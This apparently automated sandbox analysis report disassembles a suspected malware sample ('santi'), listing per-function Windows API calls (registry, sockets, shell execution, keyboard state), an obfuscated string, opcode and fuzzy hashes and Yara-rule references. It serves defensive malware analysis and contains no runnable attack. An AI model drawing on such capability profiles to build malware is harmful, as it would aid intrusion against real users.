                                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0032A806
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ArraySafeVartype
                                                                • String ID:
                                                                • API String ID: 1725837607-0
                                                                • Opcode ID: d38e1d9cabfccfcd01c54ce5877b2d6163ffd18363536c88fbb3328fa039b900
                                                                • Instruction ID: d6833ba69bf25ad8dc44e3e9ccabcc5a6979af86c95a13af5af5a8dd4fa1d9fd
                                                                • Opcode Fuzzy Hash: d38e1d9cabfccfcd01c54ce5877b2d6163ffd18363536c88fbb3328fa039b900
                                                                • Instruction Fuzzy Hash: 9EC16D75A0462ADFDB06CF98E581BAEBBF4FF08315F20846AE605E7241D734A941CF91
                                                                Function 00326B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00326B63
                                                                • LoadStringW.USER32(00000000), ref: 00326B6A
                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00326B80
                                                                • LoadStringW.USER32(00000000), ref: 00326B87
                                                                • _wprintf.LIBCMT ref: 00326BAD
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00326BCB
                                                                Strings
                                                                • %s (%d) : ==> %s: %s %s, xrefs: 00326BA8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                • API String ID: 3648134473-3128320259
                                                                • Opcode ID: bfaaf4eb5b1ef27943e78adffaeb1107152e5e6e80d805089c30dbfa192ec5d9
                                                                • Instruction ID: a598f970d256ebf1ca0ba5b6a85fbea967ecf7cbba5133186ebc1ce3f6ad458a
                                                                • Opcode Fuzzy Hash: bfaaf4eb5b1ef27943e78adffaeb1107152e5e6e80d805089c30dbfa192ec5d9
                                                                • Instruction Fuzzy Hash: FB0186F69002187FEB12A7A0DD89EF7376CDB08304F008491F746E2041EAB49E848F74
                                                                Function 00342B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00342BF6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharConnectRegistryUpper
                                                                • String ID:
                                                                • API String ID: 2595220575-0
                                                                • Opcode ID: 0d6c60793127cbce1257168a8d04b00f92166e4855e83175e7214c877c784918
                                                                • Instruction ID: 683e105fa288791366df428d88a990dcb722ce034ff0afe594d8071dfe5d5cd7
                                                                • Opcode Fuzzy Hash: 0d6c60793127cbce1257168a8d04b00f92166e4855e83175e7214c877c784918
                                                                • Instruction Fuzzy Hash: 55919B31604200AFCB12EF55C891B6EB7E5FF89310F45885DF996AB2A2DB70E915CF42
                                                                Function 003395BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • select.WSOCK32 ref: 00339691
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0033969E
                                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003396C8
                                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003396E9
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 003396F8
                                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 003397AA
                                                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0037DC00), ref: 00339765
                                                                  • Part of subcall function 0031D2FF: _strlen.LIBCMT ref: 0031D309
                                                                • _strlen.LIBCMT ref: 00339800
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                • String ID:
                                                                • API String ID: 3480843537-0
                                                                • Opcode ID: cae64949410dd25fce47b96fe8cf82869faf3f22c9a68a8c1de62f67624b58b6
                                                                • Instruction ID: d2056a68311d4645258be62c906ce1ea0bdb385dcebb07fb724bb97532433733
                                                                • Opcode Fuzzy Hash: cae64949410dd25fce47b96fe8cf82869faf3f22c9a68a8c1de62f67624b58b6
                                                                • Instruction Fuzzy Hash: EF81EE31504240EBC711EF65CC86F6BB7E8EF89714F104A2EF6559B291EBB0D914CB92
                                                                Function 0030A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • __mtinitlocknum.LIBCMT ref: 0030A991
                                                                  • Part of subcall function 00307D7C: __FF_MSGBANNER.LIBCMT ref: 00307D91
                                                                  • Part of subcall function 00307D7C: __NMSG_WRITE.LIBCMT ref: 00307D98
                                                                  • Part of subcall function 00307D7C: __malloc_crt.LIBCMT ref: 00307DB8
                                                                • __lock.LIBCMT ref: 0030A9A4
                                                                • __lock.LIBCMT ref: 0030A9F0
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00396DE0,00000018,00315E7B,?,00000000,00000109), ref: 0030AA0C
                                                                • EnterCriticalSection.KERNEL32(8000000C,00396DE0,00000018,00315E7B,?,00000000,00000109), ref: 0030AA29
                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 0030AA39
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 1422805418-0
                                                                • Opcode ID: b8b8167c2310c54b056feea537abbfd28ae4b346a5d9b5b2c4b12eee37755ba7
                                                                • Instruction ID: 1c0e5bf5f21b0cb3904406214a46e492740dc9d643307f674337be7619c1cbd3
                                                                • Opcode Fuzzy Hash: b8b8167c2310c54b056feea537abbfd28ae4b346a5d9b5b2c4b12eee37755ba7
                                                                • Instruction Fuzzy Hash: EE414771F02B059BEB16DF68EA6179DB7B4AF01334F218218E425AB2E1D7749800CB92
                                                                Function 00348ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DeleteObject.GDI32(00000000), ref: 00348EE4
                                                                • GetDC.USER32(00000000), ref: 00348EEC
                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00348EF7
                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00348F03
                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00348F3F
                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00348F50
                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0034BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00348F8A
                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00348FAA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                • String ID:
                                                                • API String ID: 3864802216-0
                                                                • Opcode ID: 613d7a89a87e3ef55db1e2a21b1e36677edcf4a116eca86cd6da017da148c2ca
                                                                • Instruction ID: 9e9d7cb2793f7566ae45130b42aa71df20b282e6b6318b6796ca0434760211e7
                                                                • Opcode Fuzzy Hash: 613d7a89a87e3ef55db1e2a21b1e36677edcf4a116eca86cd6da017da148c2ca
                                                                • Instruction Fuzzy Hash: FA317C72600214BFEB128F54DC4AFEA3BADEF49715F058065FE099E191CAB5A841CB70
                                                                Function 00350133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • GetSystemMetrics.USER32(0000000F), ref: 0035016D
                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 0035038D
                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003503AB
                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003503D6
                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003503FF
                                                                • ShowWindow.USER32(00000003,00000000), ref: 00350421
                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00350440
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                • String ID:
                                                                • API String ID: 3356174886-0
                                                                • Opcode ID: e97ea3dc3bfd1201d077ce35efdd99844b2265f7bc7c12d9a6368a2ee78b35cd
                                                                • Instruction ID: 4b835552bb557b55b8ede9cd58aec9c94281dba1d5ba50d685236be71424b9f3
                                                                • Opcode Fuzzy Hash: e97ea3dc3bfd1201d077ce35efdd99844b2265f7bc7c12d9a6368a2ee78b35cd
                                                                • Instruction Fuzzy Hash: 1CA1EF34600616EFDB1ECF28C989BBDBBB5BF08742F098115EC54AB2A0D775AD54CB90
                                                                Function 002FAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2a5a4965dfaf935e577c909b83f216cb201b750dcddde6aea7c9dffe20920135
                                                                • Instruction ID: b8d44948e7df8d3c005a646ec05117f68974a46177a65bf413b3c21f325a1599
                                                                • Opcode Fuzzy Hash: 2a5a4965dfaf935e577c909b83f216cb201b750dcddde6aea7c9dffe20920135
                                                                • Instruction Fuzzy Hash: D9717EB1910109EFCB15CF98CC49EBEBB78FF85350F248259FA19AA250C7719A51CF61
                                                                Function 00342230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 0034225A
                                                                • _memset.LIBCMT ref: 00342323
                                                                • ShellExecuteExW.SHELL32(?), ref: 00342368
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                  • Part of subcall function 002FC6F4: _wcscpy.LIBCMT ref: 002FC717
                                                                • CloseHandle.KERNEL32(00000000), ref: 0034242F
                                                                • FreeLibrary.KERNEL32(00000000), ref: 0034243E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                • String ID: @
                                                                • API String ID: 4082843840-2766056989
                                                                • Opcode ID: cf2e3f9caadd84a2655c163c7a7721d3b1dd5376d6fab01f8f6884c46561ea0f
                                                                • Instruction ID: 26353323d61ec009056ba234a63f83b9e4ce83aa79fe67ed40f95bd10343b4f3
                                                                • Opcode Fuzzy Hash: cf2e3f9caadd84a2655c163c7a7721d3b1dd5376d6fab01f8f6884c46561ea0f
                                                                • Instruction Fuzzy Hash: 31715874A106199FCB06EFA5C9819AEBBF5FF48310F518469E845AB391CB34AD50CF90
                                                                Function 00323DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32(?), ref: 00323DE7
                                                                • GetKeyboardState.USER32(?), ref: 00323DFC
                                                                • SetKeyboardState.USER32(?), ref: 00323E5D
                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00323E8B
                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00323EAA
                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00323EF0
                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00323F13
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: 0a45bda94c92ac4cf118e31f4078ed31a1fdbac6c18ba6397e2a6a65618fadf3
                                                                • Instruction ID: 0647c5f8a41a7a1bc7018e458df476291db687077faeef4b55b73fee650ffc3e
                                                                • Opcode Fuzzy Hash: 0a45bda94c92ac4cf118e31f4078ed31a1fdbac6c18ba6397e2a6a65618fadf3
                                                                • Instruction Fuzzy Hash: 8551E3B1A047E53DFB374324AC45BBA7EA95B06704F098489E1D94A8C2D3ACAED8D750
                                                                Function 00323BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetParent.USER32(00000000), ref: 00323C02
                                                                • GetKeyboardState.USER32(?), ref: 00323C17
                                                                • SetKeyboardState.USER32(?), ref: 00323C78
                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00323CA4
                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00323CC1
                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00323D05
                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00323D26
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                • String ID:
                                                                • API String ID: 87235514-0
                                                                • Opcode ID: 71ebd672863ba338d9bf1d1c40ba2f37c6511ac56358234cce4d38153646ea9a
                                                                • Instruction ID: e90384ea601758bb792f93e62d8e17d45662326dece300e62db90628476fd2bc
                                                                • Opcode Fuzzy Hash: 71ebd672863ba338d9bf1d1c40ba2f37c6511ac56358234cce4d38153646ea9a
                                                                • Instruction Fuzzy Hash: 8E5107B06047F53DFB338774DC45BB6BFA96B06700F088489E1D95A8C2D698EE94E760
                                                                Function 00327DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcsncpy$LocalTime
                                                                • String ID:
                                                                • API String ID: 2945705084-0
                                                                • Opcode ID: 1bb07d226b56f960808c94d9360a12967eea6bb8f6432c0edb41165fe5dd461e
                                                                • Instruction ID: 849fc9fc6e55658c3be0bc11d13298853af609482e706131deef304f0d900c9e
                                                                • Opcode Fuzzy Hash: 1bb07d226b56f960808c94d9360a12967eea6bb8f6432c0edb41165fe5dd461e
                                                                • Instruction Fuzzy Hash: 67419166C15218B6DB12EBF4DC4AACFB3ACAF05310F5189A7E914F7161FB34E61083A5
                                                                Function 002FB63C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCursorPos.USER32(000000FF), ref: 002FB64F
                                                                • ScreenToClient.USER32(00000000,000000FF), ref: 002FB66C
                                                                • GetAsyncKeyState.USER32(00000001), ref: 002FB691
                                                                • GetAsyncKeyState.USER32(00000002), ref: 002FB69F
                                                                Strings
                                                                • qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60, xrefs: 0035DFDC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AsyncState$ClientCursorScreen
                                                                • String ID: qw601qqw601qqw601qqw661qqw6a1qqw601qqw631qqw661qqw6a1qqw601qqw601qqw661qqw6a1qqw601qqw671qqw661qqw681qqw601qqw601qqw601qqw601qqw60
                                                                • API String ID: 4210589936-3317250924
                                                                • Opcode ID: 33c504c4c0d865c72a986cce14a42ab72fe22ecc0f8ffedb3a91a03d36b32e96
                                                                • Instruction ID: 2e78dc71911e99a0194ae1776546c71771d1fc4a413c852b6c7d3ab2ce19a28a
                                                                • Opcode Fuzzy Hash: 33c504c4c0d865c72a986cce14a42ab72fe22ecc0f8ffedb3a91a03d36b32e96
                                                                • Instruction Fuzzy Hash: D2418035604119FBCF169F64C844EE9FBB8FB05365F108329F829962A0CB70A9A4DF91
                                                                Function 00343D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00343DA1
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00343DCB
                                                                • FreeLibrary.KERNEL32(00000000), ref: 00343E80
                                                                  • Part of subcall function 00343D72: RegCloseKey.ADVAPI32(?), ref: 00343DE8
                                                                  • Part of subcall function 00343D72: FreeLibrary.KERNEL32(?), ref: 00343E3A
                                                                  • Part of subcall function 00343D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00343E5D
                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00343E25
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                • String ID:
                                                                • API String ID: 395352322-0
                                                                • Opcode ID: 28a8585f7d0b19cf118a9cb3de7c4382030755ed6d78da9a08494bd8e46b7710
                                                                • Instruction ID: 9fd6ef1d4e6c51d3042efaec52c61391be831915e0e2a9b383f2cf52a500bca8
                                                                • Opcode Fuzzy Hash: 28a8585f7d0b19cf118a9cb3de7c4382030755ed6d78da9a08494bd8e46b7710
                                                                • Instruction Fuzzy Hash: 1231DBB2D01109BFDB169B94DC85AFFB7BCEF08300F004569E512A7150D674AF859AA0
                                                                Function 00348FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00348FE7
                                                                • GetWindowLongW.USER32(00DED440,000000F0), ref: 0034901A
                                                                • GetWindowLongW.USER32(00DED440,000000F0), ref: 0034904F
                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00349081
                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003490AB
                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 003490BC
                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003490D6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
